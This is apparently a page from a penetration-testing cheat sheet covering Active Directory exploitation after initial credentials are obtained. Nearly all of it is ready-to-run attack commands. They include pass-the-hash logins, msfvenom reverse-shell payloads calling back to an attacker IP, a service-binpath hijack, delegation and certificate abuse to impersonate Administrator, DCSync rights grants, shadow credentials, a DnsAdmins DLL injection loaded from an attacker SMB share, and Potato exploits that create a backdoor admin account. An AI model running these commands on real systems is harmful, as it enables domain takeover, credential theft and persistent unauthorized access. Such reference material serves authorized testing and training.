05 / Exploitation

Exploitation

Leverage found credentials or discovered vulnerabilities to gain access — initial foothold or privilege escalation. Covers gaining a shell, abusing AD permissions and exploiting certificate vulnerabilities.

Gaining Access with Valid Credentials

Using evil-winrm, psexec, wmiexec and xfreerdp to establish a foothold on Windows systems once credentials are in hand.

evil-winrmpsexecwmiexecRDP

soon

Exploiting AD Permissions — BloodHound Paths

Server Operators, AllowedToDelegate, GenericAll, Unconstrained Delegation and SeImpersonatePrivilege — step by step exploitation for each finding.

BloodHoundDelegationACL

soon

ESC1 — Certificate Privilege Escalation

Using certipy to request a certificate as Administrator via a vulnerable template, then authenticating with it to obtain an NTLM hash.

certipyESC1AD CS

soon

Exploitation Quick Reference

BloodHound findings → approach

Finding	Approach
Server Operators group	Modify service binpath → reverse shell
AllowedToDelegate	getST.py → impersonate Administrator
ESC1 (AD CS)	certipy-ad req/auth → NTLM hash
GenericAll on user	ForceChangePassword
GenericAll on group	Add yourself to Domain Admins
Unconstrained Delegation	Wait for or force DC auth, dump TGTs
SeImpersonatePrivilege	GodPotato / PrintSpoofer

Gaining Access with Credentials

evil-winrm / xfreerdp / psexec

evil-winrm -i $TARGET_IP -u $USERNAME -p $PASSWORD      # WinRM (5985)
xfreerdp /u:$USERNAME /p:$PASSWORD /v:$TARGET_IP        # RDP (3389)
wmiexec.py $DOMAIN/$USERNAME:$PASSWORD@$TARGET_IP       # WMI (135)
smbexec.py $DOMAIN/$USERNAME:$PASSWORD@$TARGET_IP       # SMB (445)
psexec.py $DOMAIN/$USERNAME:$PASSWORD@$TARGET_IP        # SMB (445)

Pass-the-Hash — authenticate with hash instead of password

evil-winrm -i $TARGET_IP -u Administrator -H NTLMHASH
psexec.py Administrator@$TARGET_IP -hashes :NTLMHASH
wmiexec.py $DOMAIN/Administrator@$TARGET_IP -hashes :NTLMHASH

Server Operators — Service Binpath Abuse

sc.exe

1. Create reverse shell payload

msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.130.157.183 LPORT=4444 -o rce.exe

2. Start listener

nc -lvnp 4444

3. Upload rce.exe to target via evil-winrm

upload rce.exe

4. Find and check services

services

5. Modify a non-critical service binpath

sc.exe config cfn-hup binpath="C:\Users\j.rock\Desktop\rce.exe"

6. Start the service — shell comes back on port 4444

sc.exe start cfn-hup

AllowedToDelegate — Impersonate Administrator

getST.py / wmiexec.py

Linux — request service ticket as Administrator

# 1. Add CIFS to /etc/hosts
echo "$TARGET_IP haystack.domain.local" | sudo tee -a /etc/hosts

# 2. Get TGT via getST.py
getST.py -spn "cifs/haystack.domain.local" -impersonate "Administrator" \
  "$DOMAIN/SVC_ACCOUNT:$PASSWORD"
# or via computer account:
getST.py -spn host/<dc_fqdn> "$DOMAIN/<computer_account>:<computer_pass>" -impersonate Administrator

# 3. Export ticket
export KRB5CCNAME=Administrator@cifs_haystack.domain.local@DOMAIN.CCACHE

# 4. Get shell as Administrator
wmiexec.py -k -no-pass Administrator@haystack.domain.local

Windows — Rubeus constrained delegation

# 1. Request TGT for service account
Rubeus.exe asktgt /user:svc_account /password:PASSWORD /enctype:aes256 /outfile:svc.kirbi

# 2. S4U2Proxy — request TGS as Administrator
Rubeus.exe s4u /ticket:svc.kirbi /impersonateuser:Administrator \
  /msdsspn:cifs/TARGET.domain.local /ptt

ESC1 — Certificate Privilege Escalation

certipy-ad

1. Find vulnerable templates

certipy-ad find -u "$USERNAME@$DOMAIN" -p "$PASSWORD" -dc-ip $TARGET_IP -vulnerable -stdout
grep -iE "vulnerable|esc" 20260313154214_Certipy.txt  # find ESC1

2. Request certificate as Administrator (ESC1)

certipy-ad req -u "USER@$DOMAIN" -p PASSWORD \
  -ca NAAM-CA -target $DOMAIN \
  -template ServerAuth -upn Administrator@$DOMAIN \
  -dns $TARGET_IP

3. Authenticate with certificate → get NTLM hash

certipy-ad auth -pfx administrator.pfx -dc-ip $TARGET_IP

4. Use the hash

wmiexec.py -hashes :NTLMHASH $DOMAIN/Administrator@$TARGET_IP

ESC8 — NTLM relay to AD CS web enrollment

ntlmrelayx.py -t "http://$TARGET_IP/certsrv/certfnsh.asp" \
  -smb2support --adcs --template "DomainController"

GenericAll / ACL Abuse

net rpc / PowerShell / dacledit

ForceChangePassword — change user password via net rpc

net rpc password "TARGETUSER" "NewPass123!" -U "$DOMAIN/$USERNAME%$PASSWORD" -S $TARGET_IP

Via PowerShell

$Password = ConvertTo-SecureString "NewPass123!" -AsPlainText -Force
Set-ADAccountPassword -Identity "TARGETUSER" -Reset -NewPassword $Password

Add yourself to Domain Admins (GenericWrite on group)

Add-ADGroupMember -Identity "Domain Admins" -Members $USERNAME

Grant DCSync rights to yourself (WriteOwner/WriteDACL on domain)

Add-DomainObjectAcl -TargetIdentity "$DOMAIN" -PrincipalIdentity $USERNAME -Rights DCSync

Edit DACL (Linux — dacledit.py)

dacledit.py $DOMAIN/$USERNAME:'<password>'@$TARGET_IP \
  -action write -rights FullControl -target <target_object>

Change object owner (Linux — owneredit.py)

owneredit.py $DOMAIN/$USERNAME:'<password>'@$TARGET_IP \
  -action write -new-owner $USERNAME -target <object>

Add user to group via LDAP

ldeep ldap -u $USERNAME -p $PASSWORD -d $DOMAIN \
  -s ldap://$DC_IP add_to_group \
  "CN=$USERNAME,DC=..." "CN=Domain Admins,DC=..."

Unconstrained Delegation — TGT Capture

Rubeus / mimikatz

If you can execute code on the unconstrained server — monitor for TGTs

Rubeus.exe monitor /interval:5 /nowrap
rubeus monitor /interval:5

Dump the krbtgt ticket

rubeus dump /service:krbtgt /nowrap
rubeus dump /luid:0xdeadbeef /nowrap   # specific LUID session

Export via mimikatz

privilege::debug
sekurlsa::tickets /export

Use the ticket (Pass-the-Ticket)

Rubeus.exe ptt /ticket:BASE64TICKET
export KRB5CCNAME=/pad/naar/ticket.ccache

RBCD — Resource-Based Constrained Delegation

addcomputer.py / rbcd.py / getST.py

1. Create a machine account (if MAQ > 0)

addcomputer.py -computer-name 'ATTACKPC$' -computer-pass 'Pass123!' \
  "$DOMAIN/$USERNAME:$PASSWORD" -dc-ip $DC_IP

2. Set RBCD on target

rbcd.py -delegate-from 'ATTACKPC$' -delegate-to 'TARGET$' \
  -action write "$DOMAIN/$USERNAME:$PASSWORD" -dc-ip $DC_IP

3. Request TGT for your machine account

getST.py -spn "cifs/TARGET.domain.local" -impersonate "Administrator" \
  "$DOMAIN/ATTACKPC\$:Pass123!" -dc-ip $DC_IP
export KRB5CCNAME=Administrator@cifs_TARGET.domain.local@DOMAIN.CCACHE
wmiexec.py -k -no-pass Administrator@TARGET.domain.local

Shadow Credentials (GenericWrite on user/computer)

pywhisker / certipy

Via pywhisker (Linux)

pywhisker.py -d $DOMAIN -u $USERNAME -p $PASSWORD \
  --target <target_user> --action add

Via certipy shadow (Linux) — returns pfx + hash

certipy shadow auto -u $USERNAME@$DOMAIN -p $PASSWORD -account <target_user>

Machine account shadow credentials

certipy shadow auto -u '<machine$>'@$DOMAIN -k -account '<machine$>'

DNS Admin DLL Injection

msfvenom / dnscmd

Requires membership in DnsAdmins group

# 1. Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4444 -f dll -o evil.dll

# 2. Host DLL on SMB share
smbserver.py share /pad/naar/evil.dll -smb2support

# 3. Configure DNS server to load your DLL
dnscmd.exe /config /serverlevelplugindll \\$ATTACKER_IP\share\evil.dll

# 4. Restart DNS service — DLL loads as SYSTEM
sc \\DNSServer stop dns
sc \\DNSServer start dns

7.5 Potato Exploits (SeImpersonatePrivilege)

GodPotato / PrintSpoofer

Check privileges first

whoami /priv

GodPotato (Windows Server 2012+, Windows 10/11)

GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "cmd /c net user hacker Pass123! /add && net localgroup administrators hacker /add"

PrintSpoofer (Windows 10 / Server 2019)

PrintSpoofer.exe -i -c cmd

RoguePotato

RoguePotato.exe -r $ATTACKER_IP -e "cmd.exe" -l 9999

JuicyPotato (older — Windows Server 2016 and below)

JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}

← Vulnerability Discovery Next: Reverse Shells →